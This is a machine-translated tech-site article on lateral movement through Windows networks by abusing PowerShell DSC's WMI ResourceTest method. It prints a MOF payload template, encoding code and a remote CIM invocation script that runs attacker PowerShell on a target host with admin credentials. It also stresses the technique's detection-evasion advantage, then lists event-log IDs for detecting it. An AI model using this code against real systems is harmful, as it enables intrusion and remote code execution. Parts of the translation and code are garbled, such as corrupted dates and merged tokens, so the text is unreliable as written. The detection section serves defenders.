Shulou(Shulou.com)05/31 Report--

This article mainly shows you "how to conduct horizontal penetration through PowerShell DSC", the content is easy to understand, clear, hope to help you solve your doubts, the following let the editor lead you to study and learn "how to conduct horizontal penetration through PowerShell DSC" this article.

Brief introduction of horizontal infiltration Technology

PowerShell expected state configuration (DSC) allows resources that need to be executed to use WMI directly, and with the help of the DSC WMI class, we can achieve remote execution of PowerShell code by abusing built-in script resources.

Such horizontal infiltration technology has the following advantages:

1.PowerShell will be executed in a WMI service-wmiprvse.exe environment, which is an advantage from the perspective of evading detection.

Every component of 2.Payload is related to WMI.

3. There is no need to configure the DSC service.

Technical requirements for horizontal infiltration

The 1.ResourceTest method must be in the MSFT_DSCLocalConfigurationManager WMI class, which must be in the root/Microsoft/Windows/DesiredStateConfiguration namespace. Note: attackers can also choose to call ResourceGet or ResourceSet methods. PowerShell DSC was introduced in PowerShell v4, so this technology does not apply to all hosts.

two。 By default, if you want to call the WMI method remotely, you need to have administrator credentials. The security of WMI is achieved through DCOM or WSMan security settings, and when establishing a remote connection, WMI is achieved through the security descriptor of the target namespace (root/Microsoft/Windows/DesiredStateConfiguration).

Attack PoC

The first step is to prepare how Payload is executed. The PowerShell code you need to execute on the target host needs to be in MOF format. Here is a sample of Payload:

$MOFContents= @ 'instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref {ResourceID = "[Script] ScriptExample"; GetScript = "\" $(Get-Date): Iam being GET\ "| Out-FileC:\ Windows\\ Temp\\ ScriptRun.txt-Append;return $True"; TestScript = "\" $(Get-Date): Iam being TESTED\ "| Out-FileC:\\ Windows\\ Temp\\ ScriptRun.txt-Append;return $True" SetScript = "\" $(Get-Date): Iam being SET\ "| Out-FileC:\\ Windows\\ Temp\\ ScriptRun.txt-Append; return $True"; SourceInfo = ": 3::5::Script"; ModuleName = "PsDesiredStateConfiguration"; ModuleVersion = "1.0"; ConfigurationName =" ScriptTest ";}; instance of OMI_ConfigurationDocument {Version=" 2.0.0 "; MinimumCompatibleVersion =" 1.0.0 " CompatibleVersionAdditionalProperties= {"Omi_BaseResource:ConfigurationName"}; Author= "TestUser"; GenerationDate= "02Accord 26Unix 201807 Author= 09 TestUser 21"; GenerationHost= "TestHost"; Name= "ScriptTest";};'@

Here, the only thing that needs to be modified is PowerShell Payload. In our example, we will call the ResourceTest method, which returns the "TestScript" property above. It should be noted that special characters need to be escaped.

The next step is to convert MOF to binary form, which is also required by the ResourceTest method:

# Change this to false if you want to test the payload locally$ExecuteRemotely= $True$NormalizedMOFContents= [Text.Encoding]:: UTF8.GetString ([Text.Encoding]:: ASCII.GetBytes ($MOFContents)) $NormalizedMOFBytes= [Text.Encoding]:: UTF8.GetBytes ($NormalizedMOFContents) $TotalSize= [BitConverter]:: GetBytes ($NormalizedMOFContents.Length + 4) if ($ExecuteRemotely) {# Prepend the length of the payload [Byte []] $MOFBytes= $TotalSize + $NormalizedMOFBytes} else {# If executing locally, you do notprepend the payload length [Byte []] $MOFBytes= $NormalizedMOFBytes}

In the above example, if you want to test your Payload locally, do not add Payload length to the Byte array. Once the Payload is encoded correctly, all that's left is to execute Payload on the target host.

# Specify the credentials of your target$Credential= Get-Credential-Credential TempUser$ComputerName= 'TargetHost'#Establish a remote WMI session with the target system$RemoteCIMSession= New-CimSession-ComputerName $ComputerName-Credential$ Credential$LCMClass= Get-CimClass-Namespace root/Microsoft/Windows/DesiredStateConfiguration-ClassName MSFT_DSCLocalConfigurationManager-CimSession $RemoteCIMSessionif ($LCMClass-and $LCMClass.CimClassMethods [' ResourceTest']) {# You may now proceed with lateralmovement $MethodArgs = @ {ModuleName = 'PSDesiredStateConfiguration' ResourceType =' MSFT_ScriptResource' ResourceProperty= $MOFBytes} $Arguments = @ {Namespace = 'root/Microsoft/Windows/DesiredStateConfiguration' ClassName =' MSFT_DSCLocalConfigurationManager' MethodName= 'ResourceTest' Arguments = $MethodArgs CimSession= $RemoteCIMSession} # Invoke the DSC script resource Testmethod # Successful execution will be indicatedby "InDesiredState" returning True and ReturnValue returning 0. Invoke-CimMethod @ Arguments} else {Write-Warning 'The DSC lateral movementmethod is not available on the remote system.'}

In the above example, please note that I first verified the priority of remote classes and methods. When using WMI technology, we recommend that you first verify the priority of remote classes and methods.

Next, the code downloads the Payload to the disk of the target host. If you want to use WMI to get the contents of the file remotely, you can use [this technology] together. In addition, I also use CIM cmdlet here, which was introduced in PowerShell v3, and you can also use the older version of WMI cmdlet if you need to apply v2.

Terminal detection & protection

Fortunately, we can detect this attack activity by checking the event log and detect it in a timely manner.

Microsoft-Windows-PowerShell/Operational event Log EventID: 53504

The "PowerShell Named Pipe IPC" event indicates that PowerShell AppDomain is enabled. This event automatically captures "DscPsPluginWkr_AppDomain" when DSC executes script resources. While AppDomain is unique to a DSC execution, here is an example of an event:

Windows PowerShell has started an IPC listening thread on process: 6480 in AppDomain:DscPsPluginWkr_AppDomain. "Windows PowerShell" event log EventID: 400

In the normal PowerShell log, event ID 400 indicates that a new PowerShell host process has been created. When the DSC script resource executes, it generates a unique event log entry and signs it. Here is an example (engine state transitioned from NONE to Available):

Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=Default Host HostVersion=5.1.17134.81 HostId=19cfc50e-8894-4cd5-b0a9-09edd7785b7d HostApplication=C:\ Windows\ system32\ wbem\ wmiprvse.exe EngineVersion=5.1.17134.81 RunspaceId=12ebba81-9b73-4b1e-975d-e2c16da30906 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=Microsoft-Windows-DSC/Operational event log EventID: 4102

When a DSC resource is sent to the target host, the system responds to this event. If the target host exists in a computer domain, the system returns the user SID that executed the DSC resource, as well as the source host information. The following is the event sample information:

Job {893F64B5-ABBF-11E8-B005-D336977413FC}: OperationInvoke-DscResource started by user sidS-1-5-21-3160353621-618008412-2361186285-1001from computer NULL. The above is all the contents of the article "how to penetrate horizontally through PowerShell DSC". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.